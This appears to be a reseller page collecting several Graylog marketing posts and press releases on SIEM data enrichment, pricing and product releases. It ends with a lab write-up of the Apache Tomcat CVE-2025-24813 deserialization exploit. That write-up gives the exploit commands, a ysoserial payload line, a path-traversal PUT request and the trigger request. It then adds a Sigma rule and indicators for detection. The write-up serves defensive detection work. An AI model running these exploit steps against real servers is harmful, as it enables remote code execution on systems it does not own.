Skip to content

The Value of Data Enrichment in Cybersecurity Data

You’re standing in the grocery store, comparing the nutrition information for two different cereals. The enriched wheat bran cereal has more B12 vitamin content than your favorite sugary one. As an adult, you know that your body needs the additional vitamins in the enriched bran flakes, even if you really want that fruity, sugary hit in the morning.

In security, your data needs that additional hit of nutrition so you can correlate and analyze events more effectively. For data, enrichment means adding context to raw data, enabling you to gain insights and reduce alert fatigue.

To understand the value of data enrichment for cybersecurity, you should understand what data enrichment is, how your security solutions implement it, and how it improves threat detection and incident response.

What is Data Enrichment?

Data enrichment is a process that enhances raw information by adding valuable details from various external sources. In cybersecurity, this means combining security event data with other relevant information, including context about:

  • Users, like geographic location or access privileges
  • Devices like operating systems or software
  • Data types like personally identifiable information (PII), protected health information (PHI), or cardholder data
    (Possible redaction of this data for privacy purposes)

When security teams can add this context to their security monitoring, they can correlate data more precisely to improve alert fidelity and reduce alert fatigue. For example, enriching security telemetry data can improve:

  • Threat detections by incorporating threat intelligence to look for indicators of compromise and known attack tactics, techniques, and procedures (TTPs)
  • Incident response times by using the context to narrow down an incident’s root cause
  • Risk management by using context to improve anomaly detection analytics models

By continuously updating and enriching data, you can keep pace with the evolving threat landscape. For example, enriching a user’s access data with their geographic location enables your security team to identify potentially compromised credentials when the user logs into the network from a suspicious IP address or location.

Types of Cybersecurity Data Enrichment

Your organization’s enterprise IT technologies and cybersecurity tools all generate log data that helps you understand your security posture. Some examples of this data include:

  • Login failures and successes
  • Inbound and outbound network traffic
  • Asset and Vulnerability Scan Reports
  • API calls

While this information will tell you some of what’s happening, data enrichment provides deeper insights. Some additional context for cybersecurity data may include:

  • Threat Intelligence: Data about indicators of compromise from external sources like threat intelligence feeds, helping detect genuine threats.
  • Geolocation: Location data for IP addresses that can aid in identifying potential security threats from specific regions.
  • Historical Data: Data from past security incidents to help distinguish false positives from real threats.
  • Vulnerability Enrichment: Vulnerability database information that highlights potential security threats tied to known security weaknesses.

3 Benefits of Enriching Cybersecurity Data

By adding more context to your security data, your security team can gain better insights into potential threats and mitigate risk more effectively.

1.   Improved Threat Detection

Analytics models thrive on data. When you add context to your log data, your security analytics models gain a better understanding of the normal, baseline activity across your users and IT environment. Data enrichment also allows your security team to create high-fidelity alerts to reduce false positives.

2.   Improved Incident Response

Data enrichment improves key investigation and response metrics, like mean time to contain (MTTC) and mean time to resolve (MTTR). Your threat detection and incident response (TDIR) solution can use this context to help generate an incident timeline that helps your security team trace the attacker.

3.   Reduced Storage Costs

Adding context means having all your data in a centralized location. Many organizations store their telemetry in a security data lake. When you parse and enrich the data before sending it to the data lake, you can leverage the less expensive storage solution while still having data ready for an investigation if you need it.

Best Practices for Enriching and Using Cybersecurity Data

Data enrichment in cybersecurity aids your security team so they can more effectively detect and respond to potential security incidents. To achieve the full benefits of your security data, you can follow these best practices.

Centralize All Security Data.

Combining log data from across your environment is the first step to enrichment. By integrating data from your IT and security technologies in a centralized location, you can correlate and analyze events from across the environment to improve your threat detection capabilities and respond to potential incidents faster.

Normalize and Parse Security Telemetry

As part of enriching your data, you need everything to be in a common, structured format. The parsing and normalization process takes out the important parts of your logs and standardizes their format so that you can make connections between events to gain real-time insights.

Integrate Threat Intelligence

Integrating threat intelligence feeds allows organizations to detect potential threats before malicious actors can gain unauthorized access to sensitive data. Enriching your data with threat intelligence enables your response team to build high-fidelity detections that reduce alert fatigue by reducing false positives.

Enrich Data En-route to Storage

If you use a security data lake, you reduce storage costs. However, you may still need this data during an investigation. You should add the context inside the data before sending it to the storage repository so that when you want to search it, you have parsed and normalized data ready.

Simplify Data Handling

While you want to collect and enrich all data, you may not need everything immediately. To use your enriched data effectively and efficiently, you should implement a data management solution so you can separate out:

  • Active data used in real-time for dashboards, event alerts, and anomaly detection
  • Warm data used occasionally, like operational logs, historical IT performance metrics, or past event logs that may support troubleshooting or retrospective analysis
  • Archivable data stored for long-term compliance and historical analysis purposes

Leverage Analytics

Once you enrich your data, you can integrate analytics that help you identify anomalous activity that could be a potential security incident. With distributed, remote workforces, malicious actors increasingly use stolen or leaked credentials to gain unauthorized access. Anomaly detection analytics define your environment’s baseline normal using enriched data to combine user credentials and access permissions with geographic location and other information to identify potential threats.

Graylog: Data Enrichment for Cybersecurity Data

Graylog’s data enrichment capabilities enable you to incorporate valuable context to existing logs and security events to help enhance your security operations. Our solution integrates different types of contextual information, including user identity, geographic location, and device specifications. We enrich data during the parsing and normalization process so that it contains the context no matter where you store it initially.

With this enriched data, you can improve risk scoring, readability, search, and data visualization for a cohesive analysis offering comprehensive insights into your systems performance and security.

To see how Graylog fits into your organization’s security and IT operations strategy, contact us today.

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Modern Logging, Smarter Pricing: Why Graylog’s Consumption Model Just Makes Sense

In the world of log management and security analytics, one thing is abundantly clear: data volumes fluctuate. Yet most pricing models haven’t caught up. Traditional ingest-based licensing models force organizations to size their license needs based on a worst-case capacity scenario—the “high-water mark”—whether those spikes are rare and/or expected.

 

The Problem with Ingest Pricing

Think about how your environment actually works. You might see:

  • Peak usage during business hours
  • Lower volumes on weekends
  • Sharp dips, or spikes, during holidays
  • Seasonal swings based on operational cadence

But if your vendor’s pricing model doesn’t account for these natural ebbs and flows, you’re left paying for capacity you may not consistently use.  It’s an uncomfortable trade-off: either overpay to cover your times with heavy volumes or risk missing critical data.

 

Enter Graylog’s Consumption-Based Pricing

At Graylog, we believe you should only pay for what delivers real value. That’s why we are excited to announce our new consumption-based pricing model—a flexible, usage-aligned approach that reflects the real rhythms of your business[i].

Instead of obligating your organization to choose a license tied to daily maximums, consumption-based pricing works like a prepaid gift card: As you elect to write Active Data to Graylog’s indexing tier, you “draw down” or consume from your total allotment.  Multiple clusters can participate under the same consumption allotment, so as your organization matures, you can deploy new clusters where and when you need to.  Finally, this capability is available for self-managed and on-premise installations as well as Graylog-hosted environments on AWS, making Graylog the only SIEM solution provider to bring this parity to market.

You gain:

  • Flexible and shared costs
  • Freedom from overprovisioning
  • Licensing that ebbs and flows like your business

 

Whether it’s a quiet weekend or a sudden incident spike, Graylog’s pricing adapts to how and when you actually use data.

 

Coupled with Smarter Data Handling

But pricing is only half the story. With Graylog, native pipeline management and tiered data handling maximize value and align it to your costs.

Our platform enables you to:

  • Parse and enrich almost any log source without worrying about a fixed license capacity
  • Route high-priority data to active analytics for dashboards, alerts, threat detection, and compliance.
  • Move aged data into less expensive warm tiers while retaining immediate access to longer stretches of historic data.
  • “Park” less critical or less time-sensitive data—like voluminous firewall access logs, internal domain DNS queries, or verbose application logs—into our native standby Data Lake. The log data is already parsed, enriched, and structured, so retrieval is fast.

Even better, Data Lake Preview allows you to view records before retrieving them, so you can make informed decisions before incurring any additional consumption cost. It’s transparency and control, built into the platform.

With Graylog, the choice is yours.  Simply put – we believe in options, not obligations.

 

Pay for What Matters

Consumption-based pricing aligns perfectly with Graylog’s philosophy: log data is only as valuable as what it enables you to do. So why pay equally for everything, regardless of relevance or urgency?

By combining our new flexible licensing model with native pipeline management, Graylog empowers you to:

  • Maintain visibility without compromise
  • Stay within budget
  • Scale with confidence

 

Experience Graylog and contact us today to witness what a SIEM without compromise means.

[i]  While we’re excited to offer this new consumption-based pricing model to our customers, we understand that some folks are more familiar and comfortable with our traditional capacity model.  Rest assured, we will continue to offer our traditional licensing model to both new and existing customers.  The choice is yours.  As it should be!

 

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

From Alert Fatigue to Focused Response: A New Way Forward for The SOC

We’re all exhausted—both by the problem and by hearing about it. False positives and overwhelming alert volume have long plagued security operations. And despite years of innovation, solutions have remained elusive.

Alert volume. Alert fatigue. SOC burnout.

This persistent problem puts security teams in a tough position:

  • Enable a broad set of detections to catch possible threats—knowing it will lead to high alert volume, false positives, and potential SOC burnout.
  • Or, tune alerts tightly or disable noisy ones—risking blind spots and missing critical early indicators of an attack.

For CISOs and SOC managers, it’s a lose-lose scenario. And worse, the challenge is always shifting as the attack surface expands, adversaries evolve, and detection techniques multiply.

Adding more security tools and analytics often makes it worse, layering on even more data for analysts to triage.

 

The Real Answer: Evidence, Not Just Alerts

The solution isn’t finding the mythical “perfect alert” that only fires on true positives. It’s about automating the discovery of corroborating evidence that proves (or disproves) whether an alert points to a real threat.

If multiple pieces of evidence support the alert—its legitimacy is strengthened.

If no supporting data is found—it’s likely a false positive.

 

This is where Graylog 6.2 comes in.

 

Introducing A Smarter Way to Assess Risk

With version 6.2, Graylog enhances its Asset Risk Model, bringing greater precision to how risk of compromise is calculated—so you can focus on what matters most.

 

Recap: What Is Graylog’s Asset Risk Model?

Graylog Assets are an identity-construct for users and systems, recognizing that different log sources may reference the same “user” or “system” differently. The Asset Risk model was introduced last November, shifting triage from alert-based to asset-based. Instead of evaluating every alert in isolation, you focus on high-risk assets—users or machines—based on their composite risk score.

Each alert contributes to that score by factoring in:

  • Severity of the detection method (e.g., correlation, outliers, ML anomalies)
  • Environmental context
  • Frequency and diversity of alerts

 

What’s New in 6.2?

Graylog 6.2 adds Adversary-Informed Defense to the model—introducing threat campaign awareness:

  • Alerts are enriched with knowledge of adversary campaigns.
  • Alerts linked to known threat campaigns are assigned higher risk.
  • As more alerts from the same campaign surface—risk increases exponentially.

 

This creates an orthogonal signal, linking related evidence across both assets and threat campaigns, delivering a higher fidelity risk score.

 

Why This Matters

Collapsing individual alerts into asset-centric risk scores delivers immediate operational benefits:

✅ Less Time on False Positives

When a single alert fires but no corroborating activity is found, the asset risk remains low—reducing time spent chasing noise.

✅ No More “Sophie’s Choice”

The burden of tuning every rule to perfection is reduced. Graylog automatically groups related findings—even across assets—making alert triage more manageable and reducing the risk of blind spots.

✅ Faster Investigations

The initial triage questions—“who, what, where”—are answered automatically by the asset context and associated evidence, letting analysts jump straight into deeper investigation.

 

The New SOC Efficiency Model

The triad of:

  • Asset Risk
  • Exposure Awareness
  • Adversary-Informed Defense

 

delivers the precision, automation, and prioritization that modern security operations demand.

When paired with Graylog’s embedded investigation guidance and automation, the result is a leap forward—whether you’re just starting your security journey or running a mature SOC.

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Introducing Graylog 6.2: A SIEM Without Compromise

What does it really mean to have a SIEM Without Compromise? 

For too long, security teams have been stuck in a no-win game—forced to choose between visibility and cost, detection breadth and team capacity, automation, and control. Every decision felt like a trade-off, with real-world consequences: dropped logs, missed alerts, and inconsistent response when it mattered most. 

With the Spring ’25 release of Graylog Security 6.2, we’re eliminating those compromises. Our latest innovations empower you to log everything, detect what matters, and respond with precision—without overloading your team or your budget. 

Let’s break down the three most common SIEM trade-offs and how Graylog 6.2 puts them to rest. 

 

Log Collection: No More “All or Nothing” 

The Trade-Off: 

Most SIEMs license based on volume, source, or compute, making log collection a budgetary balancing act. You either drop logs to control costs or accept unpredictable licensing spikes. Once dropped, those logs—and their forensic value—are gone forever. 

The Graylog 6.2 Solution: 

With Graylog’s native pipeline management, including Data Routing and Graylog’s provided Data Lake, you don’t have to choose. Route only high-value logs (used for active dashboards, detection, and analytics) into licensed hot storage. Send everything else into your standby data lake, where it is searchable, restorable, and completely license-free. Graylog lets you Preview data in your data lake prior to retrieval, and provides selective retrieval options, ensuring the data in your SIEM is the data driving decisions.  

You get full retention with cost control—perfect for compliance, audits, and threat hunting. Your storage, your rules—on-prem or in the cloud. 

Threat Detection: From Alert Overload to Risk-Led Action 

The Trade-Off: 

More detections = more alerts = more noise. To keep alert fatigue in check, teams are forced to disable or under-tune detections—limiting early visibility into attacker behaviors. As threat campaigns evolve, keeping detection content current without overwhelming the SOC becomes impossible. 

The Graylog 6.2 Solution: 

Enter Graylog’s Adversary Informed Defense. Rather than triage individual alerts, 6.2 automatically recognizes adversary groups Tactics, Techniques, and Procedures (TTPs), chaining detections together and exponentially increasing risk scoring with each additional corroborating detection. Going a step beyond tagging detections based on their MITRE ATT&CK tactic and technique, Adversary Informed Defense uses real-world threat campaign details to recognize the presence of an attack in your environment, even if individual activities are spread over days, weeks, even months.  

And this inherently works with Graylog’s Asset Risk model, allowing teams to confidently enable more detections without drowning in alert noise, keeping them ahead of attacker TTPs without burning out their analysts. 

 

Incident Response: Ditch the Binder, Evolve Beyond the Playbook 

The Trade-Off: 

SOAR was supposed to solve alert triage with automation. In reality, most playbooks are rigid, brittle, and require expert knowledge to build and maintain. Meanwhile, LLM-based copilots introduce inconsistency—same question, different answer. 

The Graylog 6.2 Solution: 

We deliver the best of both worlds: 

  • Structured guidance with every event via embedded procedural steps 
  • Context-aware AI assistance via LLMs that analyze investigation evidence in real time 

This ensures consistent, repeatable investigations with dynamic, context-enriched support—no more toggling between static flows and unpredictable copilots. 

 

Why This Matters 

With Graylog Security 6.2, security teams no longer need to compromise: 

Legacy SIEM Trade-Off Graylog 6.2 Advantage 
Drop logs to save cost Route to license-free standby data lakes, Preview and selectively recall what is important 
Disable detections to reduce noise Enable more—and only triage alerts with automatic corroborated evidence 
Static playbooks or unpredictable AI 

Consistent steps + contextual LLM guidance 

 

 

Get Started: Experience SIEM Without Compromise 

Graylog’s Spring ‘25 release isn’t just a feature drop—it’s a shift in how modern security teams operate, adapting to your environment, in support of lean teams, and keeps you ahead of adversaries, not buried under alerts. 

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Company Introduces Adversary Campaign Intelligence to Prioritize True Cyber Threats; Data Lake Preview and Retrieval for Smart Data Retention

 

HOUSTON — April 28, 2025 — Graylog, the no-nonsense platform for Security, API protection, and IT Operations, today launched its Spring 2025 release of Graylog Security—pushing further past the limits of traditional SIEM. Building on the Fall 2024 release (version 6.1), Graylog sharpens analyst workflows, accelerates time-to-value, and sets a new bar for speed and flexibility in threat detection.

With Adversary Campaign Intelligence, Data Lake Preview, Selective Data Restore, and Threat Coverage Analyzer, Graylog can now equip teams with better detection, real-time context, and more control over what matters. Analysts get alignment between content and the data it’s meant to catch, while CISOs get the visibility to prove it’s working without making tradeoffs. 

“SIEMs have forced teams into a corner for too long—more logs mean more cost, more alerts mean more noise, and every pivot adds drag,” said Seth Goldhammer, Vice President of Product Management at Graylog. “This release flips that model. We’re using automation to clear the clutter, dial in detection, and make sure your stored data delivers value—not just volume.”

 

Adversary Campaign Intelligence

Graylog’s Adversary Campaign Intelligence redefines threat detection by continuously assessing activities based on their common targets, asset value, and exposure levels, and identifying their relationship with known attack campaigns. This calculated true attack probability reduces noise and surfaces at-risk users, endpoints, and entities by automatically corroborating evidence and context.

With updated detections to support Sigma 2.0 and responses empowered with AI guidance and automation, analysts act faster, triaging only what’s relevant and cutting down response time.

 

Data Lake Preview

Graylog allows for direct alignment to SIEM costs and the data that answers questions without sacrificing visibility by extending the data routing and data lake capabilities launched in the Fall 2024 release. Graylog’s Data Lake Preview allows teams to see if the data they need is in the Graylog Data Lake before retrieving a data set. Then, with Selective Data Retrieval, teams retrieve a narrow range of log messages on demand, greatly reducing their license consumption. 

 

Threat Coverage Analyzer

Graylog’s Threat Coverage Analyzer gives security leaders clarity into what their teams are detecting—and what they might be missing. This feature highlights detection gaps mapped to the MITRE ATT&CK framework, guiding users to detect content aligned to their SIEM’s log collection and new log collection strategies to strengthen coverage posture through data-driven decisions.

 

Graylog Live at RSAC 2025

The Graylog Spring 2025 release is now live. Visit Graylog.com to explore new features and learn more, or join us at #RSAC 2025, Booth S-3134, to see a live demo.

 

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Strengthens Regional Support; Opens Office in Singapore

HOUSTON and HONG KONG –  April 15, 2025 – Graylog, a leader in Threat Detection, Investigation, and Response, is deepening its commitment to the APAC region following a 6.5X increase in sales over the past two years — the fastest growth rate of any market for the company. As demand for modern security and log management solutions continues to rise, Graylog is expanding its footprint with a new office in Singapore, complementing its existing presence in Hong Kong. To further support this growth, Graylog has partnered with RIPEN, a leading IT security consultancy, to deliver dedicated Tier 1 and Tier 2 customer support across the region.

“Our growth in APAC isn’t just about numbers—it’s about ensuring our customers can quickly detect and respond to security threats,” said Adam Abernethy, Vice President of Customer Enablement at Graylog. “With RIPEN’s deep expertise and hands-on experience using Graylog in real-world security operations, customers get direct access to skilled professionals who can help them solve problems fast.

Expanding Graylog’s Global Sales and Support Network

Following the establishment of the company’s regional APAC office in 2022, Graylog is further expanding with the opening of an office in Singapore and the appointment of Gerald Lum as Regional Vice President of Sales. In this role, Mr. Lum will oversee the sales operations and performance in APAC, drive revenue targets, and implement sales strategies.

“As a cyber security evangelist with more than 20 years of sales and leadership experience, we welcome Gerald to the team and look forward to his contributions as we continue to help organizations across the APAC region enhance security operations, improve log management efficiency, and reduce operational costs,” said Joshua Ziel, Chief Sales Officer at Graylog.

The region continues to play an increasingly vital role in the company’s global expansion. As adoption accelerates, Mr. Lum’s arrival and the RIPEN partnership ensures that security teams have the resources, expertise, and support they need to maximize the value of their Graylog deployments.

Localised Support for APAC Security and IT Teams

RIPEN’s team will handle in-region support for Graylog’s Threat Detection, Investigation, and Response (TDIR) and Centralized Log Management solutions, helping customers:

  • Resolve security issues faster with direct access to experienced professionals
  • Get support in local languages for Tier 1 and Tier 2 troubleshooting
  • Streamline security operations by optimizing log management and threat detection workflows

“Having witnessed the transformative power of Graylog first-hand, we are thrilled to join forces to empower security and IT teams across APAC,” Stated Raymond CHENG, VP of Operation at RIPEN. ” Our collaboration will provide APAC customers with an unmatched advantage – the combined strength of our specialized knowledge and Graylog’s powerful technology – enabling them to detect threats faster, respond more effectively, and ultimately, stay ahead of the evolving threat landscape.”

RIPEN’s credentials include:

  • Accreditation from the Hong Kong Government’s Government IT Products (GITP) Scheme
  • ISO 9001:2015 certification from Accredited Certification International Limited (ACi)
  • AWS Cloud Practitioner and AWS Solutions Architect Associate certifications

APAC regional support is available Monday through Friday, 9:00 to 18:00 HKT, complementing Graylog’s existing global support coverage.

 

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Adversary Tradecraft: Apache Tomcat RCE

CVE-2025-24813 is a critical vulnerability (CVSS base score of 9.8) affecting Apache Tomcat, a widely used open-source web server and servlet container.

This issue affects Apache Tomcat:

  • 0.0-M1 through 11.0.2,
  • 1.0-M1 through 10.1.34,
  • 0.0.M1 through 9.0.98 (and most likely older versions.)

 

In this blog, we’ll simulate an attack and look at the activity within Graylog. Throughout the analysis, and at the conclusion of the post, we’ll provide practical threat-hunting and detection strategies you can implement in your own environments.

 

Attack Overview

The vulnerability is caused by improper handling of file-based session persistence when Tomcat’s default servlet configuration permits write operations and when partial HTTP PUT uploads are supported. Exploiting this flaw, attackers can upload malicious session files to the Tomcat server. These malicious files may subsequently be deserialized by applications running on the server, potentially allowing attackers to execute arbitrary code.

 

Emulating the Adversary

Lab Setup

To emulate and analyze the attack, we’ve set up a lab environment with Graylog Enterprise 6.1.8 and Illuminate Apache Tomcat Content Pack enabled to parse, normalize and enrich the logs. The pack is available in Illuminate 6.3 with the licenses Open, Security and Enterprise.

 

An Ubuntu 24.04 will serve as our “victim host” with a default installation of Tomcat. Its configuration sends Tomcat access logs via Graylog Sidecar to our Graylog instance. A vulnerable Apache Tomcat/11.0.2 is used.

Requirements:

  • The default servlet must have write permissions enabled (disabled by default)
  • Partial PUT support must be enabled (enabled by default)
  • The application uses Tomcat’s file-based session persistence with the default storage location
  • The application includes a library that can be leveraged in a deserialization attack

 

The Tomcat server uses the default setting with one exception.  We set the default servlet parameter to write permissions enabled in the web.xml and use a ysoserial.jar application for the deserialization attack.

 

The web.xml file was set to:

The exploit: e.g. CVE_2025_24813.py

A deserialization application e.g. ysoserial.jar or ysoserial.net

The following github repository has both files:

https://github.com/u238/Tomcat-CVE_2025_24813#

Git clone or copy the repository to your attacker machine.

Note:
The suggested docker container  in this repository does work with the exploit, but does not forward/create the wanted access  logs.
We only used the files but not the docker solution.

 

Run the Exploit

If all requirements are met, running the exploit is simple. Via command line, go into the folder with the exploit and the deserialisation application (1).

Run the exploit with the command (2):

python3 CVE_2025_24813.py http://localhost:8080

 

Adjust the command if needed. The exploit can take additional parameters like adding a wanted command.
To all of the extra tools use the -h flag.

 

In its default configuration, this exploit is not harmful, (it uses calc.exe) but it can be adjusted.
Some ideas are here:
https://afine.com/testing-and-exploiting-java-deserialization-in-2021/

 

If the exploit runs successfully it looks like this:

 

Steps for a Real Attack:

Prepare Java:
The ysoserial.jar may require Java version 8 or lower. Newer Java versions have Module encapsulation restrictions and therefore some gadgets (CommonsCollections5) for ysoserial.jar cannot run.

 

Step 1: Verify Writable Servlet via HTTP PUT

Ensure your Tomcat server running locally is vulnerable (has writable servlet enabled) by executing:

python3 CVE_2025_24813.py http://localhost:8080 --command "gnome-calculator" --ysoserial ysoserial.jar --gadget CommonsCollections6 --payload_type ysoserial

This command automatically:

  • Checks if the server permits PUT requests.
  • Generates a serialized payload using ysoserial.jar to execute gnome-calculator locally (if gnome is installed).

Uploads the payload file (payload.ser) to the server.

  • What Happens Behind the Scenes (Simplified):

Payload Generation (ysoserial.jar):

java -jar ysoserial.jar CommonsCollections5 "gnome-calculator" > payload.ser
  • A serialized Java object is generated to execute gnome-calculator upon deserialization.
  • Payload Upload via Python Script
  • The exploit script uploads the malicious payload

HTTP PUT request is sent to:

PUT http://localhost:8080/uploads/../sessions/u238.session

A conflict response (409) is expected, indicating successful payload placement.

 

Step 2: Trigger the Exploit

The Python exploit script automatically sends a subsequent GET request with the corresponding session cookie, forcing the server to deserialize the malicious payload:

GET http://localhost:8080/

Cookie: JSESSIONID=u238

  • The server attempts to deserialize the uploaded session file.
  • The embedded command (gnome-calculator) executes on your local machine, verifying successful exploitation.

 

Step 3: Confirming Successful Exploitation

You should observe:

  • gnome-calculator opens locally as proof of arbitrary command execution.
    Terminal output similar to:

[+] Server is writable via PUT: http://localhost:8080/check.txt

[*] Generating ysoserial payload for command: gnome-calculator

[+] Payload generated successfully: payload.ser

[+] Payload uploaded with status 409 (Conflict): http://localhost:8080/uploads/../sessions/u238.session

[+] Exploit succeeded! Server returned 500 after deserialization.

[+] Target http://localhost:8080 is vulnerable to CVE-2025-24813!

[+] Temporary file removed: payload.ser

 

Summary of Local Exploit Steps:

  • Checked PUT write permissions on Tomcat.
  • Crafted serialized payload using ysoserial.jar.
  • Uploaded payload via CVE_2025_24813.py.
  • Triggered payload deserialization.
  • Confirmed local RCE via executed command (gnome-calculator).

 

Detections

A Sigma rule can be utilized to detect the typical behavior of this attack.

On SigmaHQ a matching rule does not exist, but can be created.

web_CVE-2025-24813.yml

title: Apache Tomcat CVE-2025-24813 RCE
id: 7aa2d031-efb0-46df-b9ee-6304dbe747df
status: experimental
description: Detects potential exploitation attempts of Apache Tomcat CVE-2025-24813, allowing remote code execution via improper handling of file uploads and traversal in vulnerable versions.
author: Graylog, Stefan Waldvogel
references:
    - https://www.rapid7.com/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/
    - https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-14-Testing-CVE-2025-24813.md
    - https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24813
date: 2025/03/29
tags:
  - attack.t1190
  - attack.initial_access
  - cve.2025.24813
logsource:
    category: webserver
    product: tomcat
detection:
    selection:
        cs-method: 'PUT'
    selection_status:
        sc-status:
        - 200
        - 201
        - 204
    selection_extensions:
        c-uri-path|endswith:
        - '.jsp'
        - '.session'
        - '.war'
        - '.class'
        - '.jspx'
    filter:
        c-ip:
          - '127.0.0.1'
          - '::1'
    filter1:
        gim_tags:
          - 'source_reserved_ip'
          - 'source_is_internal'
    condition: selection and selection_status and selection_extensions and not (filter or filter1)
falsepositives:
    - Legitimate administrative file uploads (internal IP addresses or trusted sources)
level: high

 

Indicators

In this example, access logs (/opt/tomcat/updated/logs/localhost_access_log.*) give three lines that point to this exploit.

  1. The test file that checks if Tomcat fulfills the requirements for the exploit
  2. The PUT request for the .session file. The given Sigma rule would detect this behavior.
  3. The http_response_code 500 together with the hello-servlet

 

Catalina logs may give a few extra logs (if someone plays with illegal payloads):

 

Additional IoCs:

  • Unrecognized or unexpected JSP files appearing in the web application’s root directory.
  • External HTTP requests (GET/POST) directed toward unusual or suspicious JSP resources.
  • Unexpected HTTP PUT requests appearing in web server logs.
  • Signs of malicious payloads transmitted through HTTP PUT requests.
  • Web Application Firewall (WAF) alerts triggered by attempts to upload or execute unauthorized files.

 

Graylog Detections

Graylog has provided the Sigma Rules and Indicators here to share threat detection intelligence with those not running Graylog Security. Note that Graylog Security customers receive a content feed including Sigma Rules, Anomaly Detectors, Dashboards, and other content to meet various security use cases.

 

To learn how Graylog can help you improve your security posture, contact us today or watch a demo.

 

About Graylog
